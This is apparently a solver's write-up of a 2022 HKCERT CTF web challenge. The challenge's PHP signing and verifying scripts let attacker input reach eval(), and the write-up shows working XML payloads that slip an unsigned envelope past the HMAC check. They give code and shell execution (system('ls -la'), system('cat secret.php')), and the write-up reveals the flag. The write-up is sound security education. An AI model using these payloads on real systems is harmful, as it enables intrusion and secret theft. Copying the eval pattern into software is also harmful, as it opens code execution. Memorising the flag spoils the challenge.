# HKCERT-CTF 2022 Expat Passer Confucian 黃大仙祠孔道門
(17)
Expat Passer Confucian 黃大仙祠孔道門
369 Points / 1 Solve / Web / ★★★★☆
# Author
ozetta
# Solver
O0056 - T0003 (2022) @ TWY's Temple
# Description
Read out the challenge name if you have no idea what's going on with this challenge (Only applicable to the English version).
Web: `http://chal.hkcert22.pwnable.hk:28117`
# Files
expat-passer-confucian_4c1743e5acf50f6fc22c42277f28d939.zip:
- [sign.php](#signphp)
- [verify.php](#verifyphp)
# Analysis
The first line after `<?php` in both files is `include_once("secret.php");`. `include` works like the import statement in other programming languages, except that the included file inherits the variable scope of the line that includes it. (`_once` means the file is not loaded again if it has already been included.)
Also, it only emits a warning instead of an error (unlike `require` / `require_once`) when the file to include is not found.
This means the variables defined in `secret.php` are also accessible in `sign.php` and `verify.php`.
One such variable visible in the source code is `$secret`, used in `hash_hmac('sha256',$envelope,$secret);` in both files.
Opening the provided webpage in a browser shows the following interface:
<div style="border: 1px solid black; padding: 8px">
<span style="font-size:2em; font-weight: bold;">Johnny's Perfect Math Class</span><hr>
<div style="font-size:1.5em; font-weight: bold; margin: 20px 0;">Sign a message</div>
<div style="margin: 2px">
<span style="display: inline-block; width:80px;">Author</span>
<span style="display: inline-block; width:370px; padding: 1px 2px; border: 1px solid #808080; color: #a0a0a0; font-size: 13px; cursor: text; user-select: none">祖沖之</span>
</div>
<div style="margin: 2px">
<span style="display: inline-block; width:80px;">Formula</span>
<span style="display: inline-block; width:370px; padding: 1px 2px; border: 1px solid #808080; color: #a0a0a0; font-size: 13px; cursor: text; user-select: none">355/113</span>
</div>
<div style="margin: 2px">
<span style="display: inline-block; width:80px;">Comment</span>
<span style="display: inline-block; width:370px; padding: 1px 2px; border: 1px solid #808080; color: #a0a0a0; font-size: 13px; cursor: text; user-select: none">密率,圓徑一百一十三,圓周三百五十五。</span>
</div>
<div style="margin: 2px">
<span style="display: inline-block; width:80px;">Message</span>
<span style="display: inline-block; width: 188px; height: 118px; padding: 1px 2px; border: 1px solid #808080; color: #a0a0a0; font-size: 13px; cursor: text; resize: both; overflow: auto; vertical-align: top"></span>
</div>
<span style="display: inline-block; border: 1px solid gray; padding: 1px 6px; background: #e0e0e0; font-size: 13px; user-select: none">Submit</span>
<hr>
<div style="font-size:1.5em; font-weight: bold; margin: 20px 0">Verify a message</div>
<div style="margin: 16px 0">
Message
<span style="display: inline-block; border: 1px solid gray; padding: 1px 6px; background: #e0e0e0; font-size: 13px; user-select: none">Choose File</span>
<span style="display: inline-block; border: 2px; padding: 1px 6px; font-size: 13px">No file chosen</span>
</div>
<span style="display: inline-block; border: 1px solid gray; padding: 1px 6px; background: #e0e0e0; font-size: 13px; user-select: none">Submit</span>
</div>
<br>
:::info
**Johnny's Perfect Math Class** seems to be a name parody of **Cirno's Perfect Math Class (チルノのパーフェクトさんすう教室)** ||⑨||.<sup>[[Nico Nico Pedia Article / Japanese Site]](https://dic.nicovideo.jp/a/チルノのパーフェクトさんすう教室)</sup> This name also describes the intended use of the Formula field in the form as storing a mathematical expression for calculation.
**Johnny** (/ˈd͡ʒɑni/ (US), /ˈd͡ʒɒni/ (UK)) is an English name whose usual Chinese transliteration is the same as Confucius' courtesy name: **仲尼** (Cantonese: zung6 nei4 (/tsʊŋ˨nei̯˩/) / Mandarin: Zhòngní (<span style="font-family: Microsoft JhengHei, sans-serif;">ㄓㄨㄥˋㄋㄧˊ</span>) /ʈʂʊŋ˥˩ni˧˥/), so some people jokingly refer to Confucius as Johnny.
**密率** (lit. *Close Ratio*) is a close fractional approximation to π (355/113, *approx.* <u>3.141592</u>920) found by **祖沖之** (Zu Chongzhi) in the 5<sup>th</sup> century without the explicit use of continued fractions (the method is often suggested to have been "Liu Hui's π algorithm" (割圓術) or "harmonization of the divisor of the day (denominator)" (調日法), though no direct evidence from Zu is known).<sup>[[Wikipedia Article](https://en.wikipedia.org/wiki/Mil%C3%BC)]</sup> **「密率,圓徑一百一十三,圓周三百五十五。」** (lit. *Close ratio: diameter 113, circumference 355.*) is the original text recorded in *Book of Sui, Rhythm and the Calendar (I)* (《隋書·律曆志上》).
The Chinese version of the challenge title, **黃大仙祠孔道門** (lit. *Confucian Veranda, Wong Tai Sin Temple*), refers to the veranda built in front of the Confucian Hall (麟閣), where Confucius and his 72 disciples are worshipped, in Wong Tai Sin Temple<sup>[[Source]](http://www.wongtaisintemple.org.hk/en/all-buildings/content/confucian-veranda)</sup>.
:::
We can use these suggested values in the textbox to see how the service behaves.
When we type into the textboxes, the message field is updated automatically. It is also the only field in the form with a `name` attribute, which means it is the only value submitted to the server *(so we could edit it directly by removing the `readonly` attribute, though this is not actually needed)*.
The generated message field looks like the following:
```xml!
<message><author>祖沖之</author><formula>355/113</formula><comment>密率,圓徑一百一十三,圓周三百五十五。</comment></message>
```
Let's submit and see what `sign.php` does:
```
<root><envelope><message><author>祖沖之</author><formula>355/113</formula><comment>密率,圓徑一百一十三,圓周三百五十五。</comment></message><timestamp>1668402438.5818</timestamp></envelope><hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac></root>
```
(Formatted)
```xml!
<root>
<envelope>
<message>
<author>祖沖之</author>
<formula>355/113</formula>
<comment>密率,圓徑一百一十三,圓周三百五十五。</comment>
</message>
<timestamp>1668402438.5818</timestamp>
</envelope>
<hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac>
</root>
```
By observation, we can see that the message is wrapped by the `<envelope>` tag, followed by the `<hmac>` tag containing the server signature of the envelope, and all are wrapped by a single `<root>` tag.
Let's check the source in sign.php:
```php!
xml_set_element_handler($this->parser, "tag_open", "tag_close");
xml_set_character_data_handler($this->parser, "cdata");
```
The first line registers the handlers that are called when the parser reaches an opening tag (`$start_handler: tag_open`) or a closing tag (`$end_handler: tag_close`).
The second line registers the handler for the text content inside a tag (`$handler: cdata`).
The initial value of `cur` is `"X"`, and that of `bad` is `false`. We can treat `cur` as a temporary variable that tracks which tag the parser is currently inside, and `bad` as a flag that marks the payload as malformed.
```php!
function tag_open($parser, $tag, $attributes){
if($tag == 'AUTHOR' || $tag == 'FORMULA' || $tag == 'COMMENT'){
if($this->cur == 'X'){
$this->cur = $tag;
}else{
$this->bad = true;
}
}
}
```
:::info
If it reaches an AUTHOR, FORMULA, or COMMENT opening tag (PHP's XML parser upper-cases tag names by default, so `<author>` is reported as `AUTHOR`), check if `cur` is `'X'` (the tag is not nested and no tracked tag is left unclosed).
If so, then `cur` becomes the name of the tag.
Otherwise, `bad` is set as true.
:::
```php!
function tag_close($parser, $tag){
if($tag == 'AUTHOR' || $tag == 'FORMULA' || $tag == 'COMMENT'){
if($this->cur == $tag){
$this->cur = 'X';
}else{
$this->bad = true;
}
}
}
```
:::info
If it reaches an AUTHOR, FORMULA, or COMMENT closing tag (again compared in its upper-cased form), check if `cur` (the name of the opening tag) is the same as the name of the closing tag, i.e. whether the tags match.
If so, `cur` is reset to `X` (no unclosed tag).
Otherwise, `bad` is set as true.
:::
```php!
function cdata($parser, $cdata){
if($this->cur == 'AUTHOR'){
$this->author = substr($cdata, 0, 64);
}elseif($this->cur == 'FORMULA'){
$this->formula = preg_replace('/[^0-9\+\-\*\/\.]/','',$cdata);
}elseif($this->cur == 'COMMENT'){
$this->comment .= $cdata;
$this->comment = substr($this->comment, 0, 1024);
}
}
```
:::info
For the AUTHOR tag, only the first 64 bytes are stored in the `author` property (`substr` counts bytes, not characters).
For the FORMULA tag, all characters other than `0123456789+-*/.` are removed.
For the COMMENT tag, the text is appended and only the first 1024 bytes are kept in the `comment` property.
:::
As observed, the reconstructed message (`output()`), the hmac (`hash_hmac('sha256',$envelope,$secret)`), and the wrapper tags are combined to form the final XML output.
(If `bad` is true or the XML is malformed, the message is replaced by an empty `<message></message>`; the envelope and its timestamp are still emitted and signed.)
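The handler logic described above can be sketched outside PHP. The block below is a rough Python port, not the challenge's code: it uses Python's `xml.parsers.expat` binding, upper-cases tag names by hand to imitate PHP's default case folding, and uses `html.escape` as an approximation of `htmlentities`. The class and attribute names simply mirror those in `sign.php`.

```python
import html
import re
import xml.parsers.expat


class MessageParser:
    """Illustrative Python port of the sign.php state machine."""

    TRACKED = {"AUTHOR", "FORMULA", "COMMENT"}

    def __init__(self):
        self.cur = "X"          # name of the tracked tag we are inside, or "X"
        self.bad = False        # set when tracked tags are nested or mismatched
        self.malformed = False  # set when Expat rejects the document
        self.author = self.formula = self.comment = ""
        self.parser = xml.parsers.expat.ParserCreate()
        self.parser.StartElementHandler = self.tag_open
        self.parser.EndElementHandler = self.tag_close
        self.parser.CharacterDataHandler = self.cdata

    def tag_open(self, tag, attributes):
        tag = tag.upper()  # assumption: imitates PHP's default case folding
        if tag in self.TRACKED:
            if self.cur == "X":
                self.cur = tag
            else:
                self.bad = True

    def tag_close(self, tag):
        tag = tag.upper()
        if tag in self.TRACKED:
            if self.cur == tag:
                self.cur = "X"
            else:
                self.bad = True

    def cdata(self, data):
        if self.cur == "AUTHOR":
            self.author = data[:64]
        elif self.cur == "FORMULA":
            self.formula = re.sub(r"[^0-9+\-*/.]", "", data)
        elif self.cur == "COMMENT":
            self.comment = (self.comment + data)[:1024]

    def parse(self, data):
        try:
            self.parser.Parse(data, True)
        except xml.parsers.expat.ExpatError:
            self.malformed = True

    def output(self):
        if self.malformed or self.bad:
            return "<message></message>"
        parts = ["<message>"]
        if self.author:
            # html.escape only approximates PHP's htmlentities()
            parts.append("<author>" + html.escape(self.author) + "</author>")
        if self.formula:
            parts.append("<formula>" + self.formula + "</formula>")
        if self.comment:
            parts.append("<comment>" + html.escape(self.comment) + "</comment>")
        parts.append("</message>")
        return "".join(parts)


demo = MessageParser()
demo.parse("<message><formula>system('id')+1/2</formula></message>")
print(demo.output())
```

Feeding it a formula such as `system('id')+1/2` shows that only the arithmetic characters survive signing, which is why the signed formula alone is not enough for code execution.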
Let's submit the above payload to the verify section.
Here is the output:
```
Timestamp: 1668402438.5818
Author: 祖沖之
Comment: 密率,圓徑一百一十三,圓周三百五十五。
Formula: 355/113
= 3.141592920354
```
We can see that the timestamp, author, comment, and formula are shown, plus the calculation result of the formula. This calculation (by `eval`) is the most likely source of a vulnerability.
Notice that the filter in `sign.php` removes even characters like `()[]^` and spaces, so there is very little room for playing with strings in a signed formula.
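To get a feel for how little survives the filter, here is a small Python sketch that applies the same character class as the `preg_replace` call in `sign.php`. The helper name `filter_formula` and the sample inputs are made up for illustration.

```python
import re


def filter_formula(text: str) -> str:
    """Keep only digits and + - * / . (same character class as sign.php)."""
    return re.sub(r"[^0-9+\-*/.]", "", text)


for candidate in ["355/113", "system('ls')", "(1/100000).(1)", "2 ** 10"]:
    print(repr(candidate), "->", repr(filter_formula(candidate)))
```

Function names, quotes, brackets, and spaces are all dropped, so a signed formula can only ever be an arithmetic expression.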
:::spoiler Example payloads with brackets
```
(1/100000).(1/100000) // 1.0E-51.0E-5
(999**999).(999**999) // INFINF
((999**999).(999**999))^((1/100000).(999**999)) // x`vcs
((1/100000).(1))[3] // E
```
[[Further Reading]](https://github.com/splitline/PHPFuck)
Without brackets, there is really not much you can play with here.
By the way, the PHP version used by the platform is 8.1.9.
:::
Let's check how the parser works.
```php!
$xml = simplexml_load_string($upload);
```
Okay, as simple as shown.
Also see how the four attributes are extracted:
```php!
echo "Timestamp: ".$xml->envelope->timestamp."\n";
echo "Author: ".$xml->envelope->message->author."\n";
echo "Comment: ".$xml->envelope->message->comment."\n";
echo "Formula: ".$xml->envelope->message->formula."\n = ";
@eval("print(".$xml->envelope->message->formula.");");
```
Also straightforward. One thing to notice is that the envelope used here is the first `<envelope>` that is a **direct child (exactly 1 level below) of the root**.
Let's check how the verifier works.
The hmac is computed as:
```php!
$hmac_computed = hash_hmac('sha256',$envelope,$secret); // $secret in secret.php
// checking mechanism
$hmac === $hmac_computed
```
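For reference, the same computation can be sketched in Python with the standard `hmac` module. The secret used here is a placeholder, not the server's, and the function name `sign_envelope` is hypothetical.

```python
import hashlib
import hmac


def sign_envelope(envelope: str, secret: str) -> str:
    """Python counterpart of hash_hmac('sha256', $envelope, $secret)."""
    return hmac.new(secret.encode(), envelope.encode(), hashlib.sha256).hexdigest()


placeholder_secret = "not-the-real-secret"  # assumption: stand-in for $secret
envelope = "<envelope><message></message><timestamp>0</timestamp></envelope>"

original = sign_envelope(envelope, placeholder_secret)
reformatted = sign_envelope(envelope.replace("><", ">\n<"), placeholder_secret)

print(original)
print(original == reformatted)  # any whitespace change gives a different digest
```

The digest covers the exact bytes of the envelope string, so a signed envelope can only be reused if it is copied unchanged.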
The hmac is extracted by:
```php!
// $upload is the xml content
preg_match('/\<hmac\>(.*?)\<\/hmac\>/',$upload,$matches)
$hmac = $matches[1];
```
Which is the inner content of the first \<hmac\>\</hmac\> found.
The envelope used above is computed as:
```php!
preg_match('/\<envelope\>.*?\<\/envelope\>/',$upload,$matches)
$envelope = $matches[0];
```
Which is the outer content (including the tags) of the **first** \<envelope\>\</envelope\> found.
Notice the definitions of the envelope used in hmac checking and that of the envelope used in data retrieval are different.
:::info
**Recall:**
- The envelope used in hmac checking
- The **first** envelope found in the file **(actually with more rules, to be discussed later)**
- The envelope used in data retrieval
  - The **first** envelope found in the file **as a direct child of root (not among all descendants)**
:::
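The two lookups can be compared side by side in a short Python sketch. It uses `re` and `xml.etree.ElementTree` as stand-ins for `preg_match` and SimpleXML, so it only approximates the PHP behaviour; the function names, the `wrapper` tag, and the sample document are invented for illustration.

```python
import re
import xml.etree.ElementTree as ET

ENVELOPE_RE = re.compile(r"<envelope>.*?</envelope>")


def envelope_for_hmac(upload: str):
    """First <envelope>...</envelope> anywhere in the raw text (regex view)."""
    match = ENVELOPE_RE.search(upload)
    return match.group(0) if match else None


def formula_for_eval(upload: str) -> str:
    """root -> first envelope child -> first message -> first formula (tree view)."""
    node = ET.fromstring(upload)
    for name in ("envelope", "message", "formula"):
        node = node.find(name)  # find() only looks at direct children
        if node is None:
            return ""
    return node.text or ""


upload = (
    "<root>"
    "<wrapper><envelope><message><formula>1+1</formula></message></envelope></wrapper>"
    "<envelope><message><formula>$secret</formula></message></envelope>"
    "<hmac>abc</hmac>"
    "</root>"
)

print(envelope_for_hmac(upload))  # the envelope nested inside <wrapper>
print(formula_for_eval(upload))   # the formula of the direct-child envelope
```

The regex view and the tree view pick different envelopes from the same document, which is the mismatch the rest of the analysis relies on.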
This means that if the first envelope in the file is not exactly 1 level below the root, it is used for hmac checking but not for data retrieval. So we can reuse the known hmac from signing for such an envelope:
(Formatted)
```xml!
<root>
<this-is-only-for-hmac-checking>
<envelope>
<message>
<author>祖沖之</author>
<formula>355/113</formula>
<comment>密率,圓徑一百一十三,圓周三百五十五。</comment>
</message>
<timestamp>1668402438.5818</timestamp>
</envelope>
</this-is-only-for-hmac-checking>
<hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac>
</root>
```
Then we can add another envelope, as a direct child of the root, to execute arbitrary code. (Neither the hmac check nor the character filtering is applied to this envelope.)
(Formatted)
```xml!
<root>
<this-is-only-for-hmac-checking>
<envelope>
<message>
<author>祖沖之</author>
<formula>355/113</formula>
<comment>密率,圓徑一百一十三,圓周三百五十五。</comment>
</message>
<timestamp>1668402438.5818</timestamp>
</envelope>
</this-is-only-for-hmac-checking>
<envelope>
<message>
<author>O0056 - T0003 (2022) @ TWY’s Temple</author>
<formula>$secret</formula>
<comment>Execute Arbitrary PHP Code.</comment>
</message>
<timestamp>In the Future</timestamp>
</envelope>
<hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac>
</root>
```
This is used to get the content of `$secret`.
Notice that no `s` (single line / dotall) flag is specified in `preg_match`, so `.` does not match new-line characters and the pattern cannot match an envelope that spans several lines. Therefore we need to remove all new-line characters inside the signed envelope.
:::warning
(Reminder: the signed envelope must be kept identical regardless of the regex flag, because adding line breaks, spaces, or tabs changes the input string and therefore the hmac, just as with any other hash function.)
:::
For example:
```xml!
<root><this-is-only-for-hmac-checking><envelope><message><author>祖沖之</author><formula>355/113</formula><comment>密率,圓徑一百一十三,圓周三百五十五。</comment></message><timestamp>1668402438.5818</timestamp></envelope></this-is-only-for-hmac-checking><envelope><message><author>O0056 - T0003 (2022) @ TWY’s Temple</author><formula>$secret</formula><comment>Execute Arbitrary PHP Code.</comment></message><timestamp>In the Future</timestamp></envelope><hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac></root>
```
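Assembling such a one-line payload from a signed response can be sketched as follows. This is a hypothetical helper rather than the script used during the contest: `build_payload`, the `decoy` wrapper name, and the `0` timestamp are all arbitrary choices, and the formula is XML-escaped on the assumption that the verifier decodes entities when reading the element text.

```python
import re
from xml.sax.saxutils import escape


def build_payload(signed_xml: str, formula: str, wrapper: str = "decoy") -> str:
    """Wrap the signed envelope and append an unsigned one as a child of root."""
    env = re.search(r"<envelope>.*?</envelope>", signed_xml)
    mac = re.search(r"<hmac>(.*?)</hmac>", signed_xml)
    if env is None or mac is None:
        raise ValueError("signed XML must contain <envelope> and <hmac>")
    evil = (
        "<envelope><message><formula>" + escape(formula) + "</formula></message>"
        "<timestamp>0</timestamp></envelope>"
    )
    # The signed envelope is copied verbatim so that its hmac stays valid.
    return (
        "<root><" + wrapper + ">" + env.group(0) + "</" + wrapper + ">"
        + evil + "<hmac>" + mac.group(1) + "</hmac></root>"
    )


signed = (
    "<root><envelope><message><formula>355/113</formula></message>"
    "<timestamp>1668402438.5818</timestamp></envelope>"
    "<hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac></root>"
)
print(build_payload(signed, "$secret"))
```

The printed string can be saved to a file and uploaded through the "Verify a message" form.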
:::info
This regex pattern also means we can have another solution.
We can keep the signed envelope on 1 line (this is still necessary), but place the malicious envelope, spread over more than 1 line, before it. This way we do not need any fake wrapper tag.
Example:
```xml!
<root>
<envelope>
<message>
<author>O0056 - T0003 (2022) @ TWY’s Temple</author>
<formula>$secret</formula>
<comment>Execute Arbitrary PHP Code.</comment>
</message>
<timestamp>In the Future</timestamp>
</envelope>
<envelope><message><author>祖沖之</author><formula>355/113</formula><comment>密率,圓徑一百一十三,圓周三百五十五。</comment></message><timestamp>1668402438.5818</timestamp></envelope>
<hmac>92551010b731011699933d211a0bf623cc5d05a7edee795f7f6e270d4aa03b7c</hmac>
</root>
```
:::
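The effect of the missing flag can be checked with a small Python sketch. Python's `re` treats `.` the same way when `re.DOTALL` is not set, so it serves as a stand-in for the PHP pattern; the sample strings are invented.

```python
import re

NO_DOTALL = re.compile(r"<envelope>.*?</envelope>")            # like the PHP pattern
WITH_DOTALL = re.compile(r"<envelope>.*?</envelope>", re.DOTALL)  # like adding /s

multi_line = "<envelope>\n<message>unsigned</message>\n</envelope>"
single_line = "<envelope><message>signed</message></envelope>"
upload = "<root>\n" + multi_line + "\n" + single_line + "\n<hmac>deadbeef</hmac>\n</root>"

print(NO_DOTALL.search(upload).group(0) == single_line)   # True
print(WITH_DOTALL.search(upload).group(0) == multi_line)  # True
```

Without the flag, the multi-line envelope is skipped by the regex even though it comes first, while an XML parser still sees it as the first envelope under the root.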
We can check the result using this payload. The result is:
```
Timestamp: In the Future
Author: O0056 - T0003 (2022) @ TWY’s Temple
Comment: Execute Arbitrary PHP Code.
Formula: $secret
= hkcert222{sorry,not this way...}
```
Clearly the value of `$secret` is `hkcert222{sorry,not this way...}`, but it is not the flag.
We can also use other payloads like `phpinfo()` (to check the PHP version, configs, etc.).
More importantly, we can read arbitrary files (using `file_get_contents($filename)`) and, going further, execute shell commands using `system($command)`.
This means we can list the files as needed.
```
Timestamp: In the Future
Author: O0056 - T0003 (2022) @ TWY’s Temple
Comment: Execute Arbitrary PHP Code.
Formula: system('ls -la')
= total 24
dr-xr-xr-x 1 root root 4096 Nov 4 03:24 .
dr-xr-xr-x 1 root root 4096 Aug 23 13:01 ..
-r--r--r-- 1 root root 1217 Oct 30 03:53 index.html
-r--r--r-- 1 root root 511 Oct 30 03:53 secret.php
-r--r--r-- 1 root root 2752 Oct 30 03:53 sign.php
-r--r--r-- 1 root root 1037 Oct 30 03:53 verify.php
-r--r--r-- 1 root root 1037 Oct 30 03:53 verify.php
```
(`system($command)` returns the last line of output, so it is duplicated here as it is wrapped by `print()`.)
There is no file with a name like `flag`, but the file size of `secret.php` suggests that it contains more than just the `$secret` used for the hmac calculation.
```php!
Timestamp: In the Future
Author: O0056 - T0003 (2022) @ TWY’s Temple
Comment: Execute Arbitrary PHP Code.
Formula: system('cat secret.php')
= <?php $secret = "hkcert222{sorry,not this way...}";
```
Just that? Check the scroll bar more carefully...
(or just use `base64 secret.php` to avoid being trolled)
```php!
Timestamp: In the Future
Author: O0056 - T0003 (2022) @ TWY’s Temple
Comment: Execute Arbitrary PHP Code.
Formula: system('cat secret.php')
= <?php $secret = "hkcert222{sorry,not this way...}";
// ...
// lots of blank lines
// ...
$flag = "hk"."cert"."22"."{"."Million_years_0f_paradigm"."-"."Billion_units_0f_lol"."}";
// ...
// lots of blank lines
// ...
?>?>
```
We can already see the flag content.
(That's also why grep `hkcert` does not work. This may also somehow troll users using `head`, `tail`, etc. to read `secret.php`)
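A quick Python check illustrates the point about `grep`. The line is copied from the output above; joining the quoted pieces is a naive stand-in for PHP's `.` concatenation and only works because every operand here is a plain string literal.

```python
import re

line = '$flag = "hk"."cert"."22"."{"."Million_years_0f_paradigm"."-"."Billion_units_0f_lol"."}";'

# The literal text "hkcert" never appears in the source line.
print("hkcert" in line)

# Joining the quoted pieces reproduces what PHP computes at run time.
pieces = re.findall(r'"([^"]*)"', line)
flag = "".join(pieces)
print(flag)
```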
To avoid possible copy / manual input error, we can use the `$flag` variable instead.
```!
Timestamp: In the Future
Author: O0056 - T0003 (2022) @ TWY’s Temple
Comment: Execute Arbitrary PHP Code.
Formula: $flag
= hkcert22{Million_years_0f_paradigm-Billion_units_0f_lol}
```
The flag is then obtained.
:::success
> Read out the challenge name if you have no idea what’s going on with this challenge (Only applicable to the English version).
Read it again:
Expat (Expat ~~Expect~~ ~~Expert~~) Passer (Parser) Confucian (Confusion)
> expat is still expat.. Expat is an XML parser - ozetta
What we did was confuse the parsers into taking different envelopes for different purposes.
> 異鄉過客孔夫子 - ozetta
A word-by-word translation? (異鄉 *expat*, 過客 *passer*, 孔夫子 *Confucius*)
:::
# Appendix
## Frontend Source
:::spoiler Source
```html=
<html>
<head>
<title>Johnny's Perfect Math Class</title>
<meta charset="utf-8" />
</head>
<body>
<h1>Johnny's Perfect Math Class</h1>
<hr />
<h2>Sign a message</h2>
<form method="post" action="sign.php">
<table>
<tr><td>Author</td><td><input id="author" onchange="msgbox()" placeholder="祖沖之" size="50" /></td></tr>
<tr><td>Formula</td><td><input id="formula" onchange="msgbox()" placeholder="355/113" size="50" /></td></tr>
<tr><td>Comment</td><td><input id="comment" onchange="msgbox()" placeholder="密率,圓徑一百一十三,圓周三百五十五。" size="50" /></td></tr>
<tr><td>Message</td><td><textarea id="message" name="message" readonly="readonly" cols="22" rows="7" /></textarea></tr>
<tr><td colspan="2"><input type="submit"/></td></tr>
</table>
</form>
<hr />
<h2>Verify a message</h2>
<form method="post" action="verify.php" enctype="multipart/form-data">
<p>Message <input type="file" name="message" /></p>
<p><input type="submit" /></p>
</form>
<script>
function msgbox(){
message.innerText = `<message><author>${author.value}</author><formula>${formula.value}</formula><comment>${comment.value}</comment></message>`;
}
</script>
</body>
</html>
```
:::
## Provided Source File(s)
### sign.php
:::spoiler Source
```php=
<?php
include_once("secret.php");
class MessageParser{
private $parser;
private $cur;
private $bad;
private $author;
private $formula;
private $comment;
private $message;
function __construct() {
$this->cur = "X";
$this->bad = false;
$this->author = "";
$this->formula = "";
$this->comment = "";
$this->message = "<message></message>";
$this->parser = xml_parser_create();
xml_set_object($this->parser, $this);
xml_set_element_handler($this->parser, "tag_open", "tag_close");
xml_set_character_data_handler($this->parser, "cdata");
}
function __destruct(){
xml_parser_free($this->parser);
unset($this->parser);
}
function parse($data){
xml_parse($this->parser, $data);
}
function tag_open($parser, $tag, $attributes){
if($tag == 'AUTHOR' || $tag == 'FORMULA' || $tag == 'COMMENT'){
if($this->cur == 'X'){
$this->cur = $tag;
}else{
$this->bad = true;
}
}
}
function cdata($parser, $cdata){
if($this->cur == 'AUTHOR'){
$this->author = substr($cdata, 0, 64);
}elseif($this->cur == 'FORMULA'){
$this->formula = preg_replace('/[^0-9\+\-\*\/\.]/','',$cdata);
}elseif($this->cur == 'COMMENT'){
$this->comment .= $cdata;
$this->comment = substr($this->comment, 0, 1024);
}
}
function tag_close($parser, $tag){
if($tag == 'AUTHOR' || $tag == 'FORMULA' || $tag == 'COMMENT'){
if($this->cur == $tag){
$this->cur = 'X';
}else{
$this->bad = true;
}
}
}
function output(){
if(xml_get_error_code($this->parser) || $this->bad == true){
return "<message></message>";
}else{
$this->message = "<message>";
if($this->author != ""){
$this->message .= "<author>".htmlentities($this->author)."</author>";
}
if($this->formula != ""){
$this->message .= "<formula>".$this->formula."</formula>";
}
if($this->comment != ""){
$this->message .= "<comment>".htmlentities($this->comment)."</comment>";
}
$this->message .= "</message>";
return $this->message;
}
}
}
if(isset($_POST["message"])){
$msgparser = new MessageParser();
$msgparser->parse($_POST["message"]);
$output = $msgparser->output();
$envelope = "<envelope>".$output."<timestamp>".microtime(1)."</timestamp></envelope>";
$hmac = hash_hmac('sha256',$envelope,$secret);
$final = "<root>".$envelope."<hmac>".$hmac."</hmac></root>";
header('Content-Disposition: attachment; filename="'.$hmac.'.xml"');
echo $final;
}else{
header("Location: index.html");
exit();
}
?>
```
:::
### verify.php
:::spoiler Source
```php=
<?php
include_once("secret.php");
header("Content-type: text/plain");
if(isset($_FILES['message']) && is_uploaded_file($_FILES['message']['tmp_name'])){
$upload = file_get_contents($_FILES['message']['tmp_name']);
if(preg_match('/\<envelope\>.*?\<\/envelope\>/',$upload,$matches)){
$envelope = $matches[0];
if(preg_match('/\<hmac\>(.*?)\<\/hmac\>/',$upload,$matches)){
$hmac = $matches[1];
$hmac_computed = hash_hmac('sha256',$envelope,$secret);
if($hmac === $hmac_computed){
$xml = simplexml_load_string($upload);
echo "Timestamp: ".$xml->envelope->timestamp."\n";
echo "Author: ".$xml->envelope->message->author."\n";
echo "Comment: ".$xml->envelope->message->comment."\n";
echo "Formula: ".$xml->envelope->message->formula."\n = ";
@eval("print(".$xml->envelope->message->formula.");");
}else{
die("Error: invalid hmac");
}
}else{
die("Error: no hmac found");
}
}else{
die("Error: no envelope found");
}
}
?>
```
:::
# Flag
:::spoiler Flag
``hkcert22{Million_years_0f_paradigm-Billion_units_0f_lol}``
:::